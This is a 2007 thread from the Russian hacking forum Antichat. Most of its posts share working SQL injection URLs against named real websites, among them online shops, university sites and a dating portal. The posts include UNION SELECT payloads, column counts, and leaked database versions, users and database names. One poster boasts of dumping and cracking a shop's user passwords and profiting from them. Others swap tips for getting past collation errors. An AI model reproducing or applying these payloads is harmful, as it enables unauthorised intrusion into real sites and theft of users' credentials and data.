Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
04.09.2007, 12:27
|
|
Участник форума
Регистрация: 22.05.2007
Сообщений: 144
Провел на форуме:
306311
Репутация:
119
|
|
Интернет магазин 1 d o l l a r . r u, даже выплаты на автомате
http://1dollar.ru/?g=9999+union+select+1,2,login,4,email,6,7,8,psw+f rom+users+limit+558+,+1/*
mysql: 4.1.22-standard-log
Вытащил пароли всех юзеров, пароли в md5, половину только расшифровал, и немного поживился  |
|
|
04.09.2007, 23:04
|
|
Moderator - Level 7
Регистрация: 21.03.2007
Сообщений: 1,200
Провел на форуме:
7134052
Репутация:
1204
|
|
хм
berkeley.edu
скрипт: journalism.berkeley.edu/students/resume.php
параметр: ID
кол-во колонок: 23
версия: 4.1.22
юзер: jschool@localhost
база: facebook
|
|
|
|
04.09.2007, 23:38
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Код:
http://www.multi-service.ru/main.php?inc=tb_viev&pref=1&sw=1&id_vlosh=16+order+by+9/*
дальше не пошло. может мускул 3 версии , где то в топике была ссылка на статью по инъекции в 3 версию... лень искать...
а может хитрый какой нить запрос ... не знаю... крутите дальше кто хочет )
|
|
|
|
04.09.2007, 23:48
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217
Репутация:
2097
|
|
game-ost.ru
4.1.14-log:gameost1_ananii@localhost:gameost1_gameost
Код:
http://www.game-ost.ru/news_comments.php?id=399+UNION+SELECT+1,concat(cast(version()+as+binary),char(58),cast(user()+as+binary),char(58),cast(database()+as+binary)),3,4,5,6,7,8,9,10+from+news+--+
Смог подобрать 2 таблицы: news,articles
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
|
|
|
|
05.09.2007, 08:40
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838
Репутация:
770
|
|
http://www.globaltrading.ru/price.php3?Cat_id=1393+union+select+1,2,3,4,5,6,ve rsion(),database(),user(),10,11,12,13,14,version() ,16,17,18,19,20,21,22/*
globalt9_globaltr
4.0.18-log
globalt9_globalt@localhost
_________________
edited:
http://www.goldsteel.ru/catalog.php?tovar_id=123+union+select+1,2,3,4,5,6, 7,concat(user(),char(58),version(),char(58),databa se()),9/*
нет прямого вывода данных -(
_________________
edited2:
http://mag-russia.ru/news.php?id=38'+union+select+1,user(),concat(datab ase(),char(58),version()),4/*
1gb_mag_russia@10.0.1.24
1gb_mag_russia:5.0.24a-community-max-nt-log
//там же и админка.
Последний раз редактировалось Calcutta; 05.09.2007 в 10:06..
|
|
|
|
05.09.2007, 09:47
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
edu. Код: http://www.sbus.cau.edu/News_details.php?id=-13+union+select+1,2,3,4,5,6/*
help! не могу понять что тут я неправильно делаю код:
http://www.sbus.cau.edu/News_details.php?id=-13+union+select+1,user(),3,4,5,6/*
|
|
|
|
05.09.2007, 10:38
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838
Репутация:
770
|
|
Сообщение от fobofob
edu. Код: http://www.sbus.cau.edu/News_details.php?id=-13+union+select+1,2,3,4,5,6/*
help! не могу понять что тут я неправильно делаю код:
http://www.sbus.cau.edu/News_details.php?id=-13+union+select+1,user(),3,4,5,6/*
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
Выдает эту ошибку на запрос к любой колонке, существующей в базе. выходит стоит какая-то защита, имо.
|
|
|
|
05.09.2007, 10:48
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
help! не могу понять что тут я неправильно делаю код:
Вот так пробуй:
http://www.sbus.cau.edu/News_details.php?id=-13+union+select+1,AES_DECRYPT(AES_ENCRYPT(user(),1 ),1),3,4,5,6/*
Или даже так:
http://www.sbus.cau.edu/News_details.php?id=-13+union+select+1,CAST(user()+AS+BINARY),3,4,5,6/*
Это не защита на хосте, это проблема перекодировки из UTF-8.
Последний раз редактировалось groundhog; 05.09.2007 в 10:56..
|
|
|
|
05.09.2007, 11:27
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838
Репутация:
770
|
|
http://www.watchiki.ru/p/19+union+select+1,2,concat(version(),char(58),data base(),char(58),user()),4,5,6,7/*
4.1.22
k1_tiktak
k1_tiktak@localhost
но почему то у меня постоянная проблема с подбором паролей и е-маилов -( кто может подсказать, или доработать этот скуль?
|
|
|
|
05.09.2007, 13:56
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Уязвимость на крупном украинском портале знакомств:
http://www.ukraineloves.com/search/extend-info.php?girl_id=-1+UNION+SELECT+VERSION(),2,3,4,5,USER(),DATABASE() ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47,48,49,50,51,52,53,54--+&photo=1
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
